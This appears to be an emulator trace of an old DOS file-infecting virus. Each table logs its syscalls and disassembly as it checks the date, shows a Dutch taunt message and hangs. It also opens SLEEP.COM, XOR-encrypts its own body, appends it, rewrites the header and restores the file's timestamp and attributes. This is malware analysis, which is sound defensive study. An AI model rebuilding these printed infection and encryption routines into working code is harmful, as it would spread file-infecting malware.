.
Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-17T22:19:46.558557694Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-17T22:19:46.561138175Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-17T22:19:46.562183057Z | 78 | PC: 12aa5 | Find first file |
2018-12-17T22:19:46.567867284Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-17T22:19:46.573568955Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-17T22:19:46.589691226Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-17T22:19:46.593887557Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-17T22:19:46.595147204Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-17T22:19:46.599469725Z | 66 | PC: 12af8 | Move file pointer |
2018-12-17T22:19:46.600592415Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-17T22:19:46.602173885Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-17T22:19:46.607604834Z | 66 | PC: 12af8 | Move file pointer |
2018-12-17T22:19:46.608600436Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-17T22:19:46.612682234Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-17T22:19:46.614397371Z | 62 | PC: 12b61 | Close file |
2018-12-17T22:19:46.619717793Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-17T22:19:46.632181994Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-25T11:49:00.328981245Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.331909429Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-25T11:49:00.333711283Z | 78 | PC: 12aa5 | Find first file |
2018-12-25T11:49:00.341421675Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-25T11:49:00.348734055Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-25T11:49:01.515658207Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-25T11:49:01.523695273Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-25T11:49:01.525269631Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-25T11:49:01.532317494Z | 66 | PC: 12af8 | Move file pointer |
2018-12-25T11:49:01.534199853Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-25T11:49:01.536536227Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-25T11:49:01.545161176Z | 66 | PC: 12af8 | Move file pointer (See above) |
2018-12-25T11:49:01.54676955Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-25T11:49:01.553907784Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-25T11:49:01.55526328Z | 62 | PC: 12b61 | Close file |
2018-12-25T11:49:01.563973269Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-25T11:49:01.575291783Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-25T11:49:00.419848411Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.42193974Z | 9 | PC: 12a89 | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ') |
.
Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-25T11:49:00.530753822Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.533375252Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-25T11:49:00.934847234Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:00.937651295Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-25T11:49:00.938615115Z | 78 | PC: 12aa5 | Find first file |
2018-12-25T11:49:00.945099394Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-25T11:49:00.952220487Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-25T11:49:00.967860463Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-25T11:49:00.975014814Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-25T11:49:00.984107676Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-25T11:49:00.991386117Z | 66 | PC: 12af8 | Move file pointer |
2018-12-25T11:49:00.993162066Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-25T11:49:00.995636713Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-25T11:49:01.004118866Z | 66 | PC: 12af8 | Move file pointer (See above) |
2018-12-25T11:49:01.005372833Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-25T11:49:01.011992032Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-25T11:49:01.013699484Z | 62 | PC: 12b61 | Close file |
2018-12-25T11:49:01.021238828Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-25T11:49:01.031182063Z | 26 | PC: 12b4e | Set disk transfer address |
.
Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-25T11:49:01.741311159Z | 42 | PC: 12a73 | Get date 0x12a73: cmp dh, 8 0x12a76: jb 0x12a8c 0x12a78: cmp dl, 0x16 0x12a7b: jb 0x12a8c 0x12a7d: cmp al, 3 0x12a7f: jne 0x12a8c 0x12a81: mov ah, 9 0x12a83: lea dx, word ptr [bp + 0x135] 0x12a87: int 0x21 0x12a89: cli 0x12a8a: jmp 0x12a89 0x12a8c: cmp dh, 5 0x12a8f: jae 0x12a94 0x12a91: jmp 0x12b47 0x12a94: mov ah, 0x1a 0x12a96: mov dx, 0xfc00 0x12a99: int 0x21 0x12a9b: mov ah, 0x4e 0x12a9d: lea dx, word ptr [bp + 0x12f] 0x12aa1: xor cx, cx |
2018-12-25T11:49:01.743857399Z | 26 | PC: 12a9b | Set disk transfer address |
2018-12-25T11:49:01.744808473Z | 78 | PC: 12aa5 | Find first file |
2018-12-25T11:49:01.750646258Z | 67 | PC: 12ab2 | Get or set file attributes |
2018-12-25T11:49:01.756571137Z | 67 | PC: 12aba | Get or set file attributes |
2018-12-25T11:49:01.772600645Z | 61 | PC: 12abf | Open file (Filename = 'SLEEP.COM') |
2018-12-25T11:49:01.779058123Z | 87 | PC: 12ac5 | Get or set file date and time |
2018-12-25T11:49:01.780762309Z | 63 | PC: 12ad2 | Read file or device (Read 4 bytes on handle 5) |
2018-12-25T11:49:01.786799836Z | 66 | PC: 12af8 | Move file pointer |
2018-12-25T11:49:01.788003727Z | 44 | PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl 0x12b10: lea si, word ptr [bp + 4] 0x12b14: mov di, 0xfd00 0x12b17: mov cx, 0x18 0x12b1a: rep movsb byte ptr es:[di], byte ptr [si] 0x12b1c: lea si, word ptr [bp + 0x1c] 0x12b20: mov cx, 0x1e3 0x12b23: lodsb al, byte ptr [si] 0x12b24: xor al, dl 0x12b26: stosb byte ptr es:[di], al 0x12b27: loop 0x12b23 0x12b29: mov ah, 0x40 0x12b2b: mov dx, 0xfd00 0x12b2e: mov cx, 0x1fb 0x12b31: int 0x21 0x12b33: mov ax, 0x4200 0x12b36: call 0x22af2 0x12b39: mov ah, 0x40 0x12b3b: lea dx, word ptr [bp + 0x12c] 0x12b3f: mov cx, 4 |
2018-12-25T11:49:01.790422763Z | 64 | PC: 12b33 | Write file or device (Write 507 bytes on handle 5) |
2018-12-25T11:49:01.798294351Z | 66 | PC: 12af8 | Move file pointer (See above) |
2018-12-25T11:49:01.799302912Z | 64 | PC: 12b44 | Write file or device (Write 4 bytes on handle 5) |
2018-12-25T11:49:01.80337281Z | 87 | PC: 12b5d | Get or set file date and time |
2018-12-25T11:49:01.805011789Z | 62 | PC: 12b61 | Close file |
2018-12-25T11:49:01.81223854Z | 67 | PC: 12b6a | Get or set file attributes |
2018-12-25T11:49:01.821513987Z | 26 | PC: 12b4e | Set disk transfer address |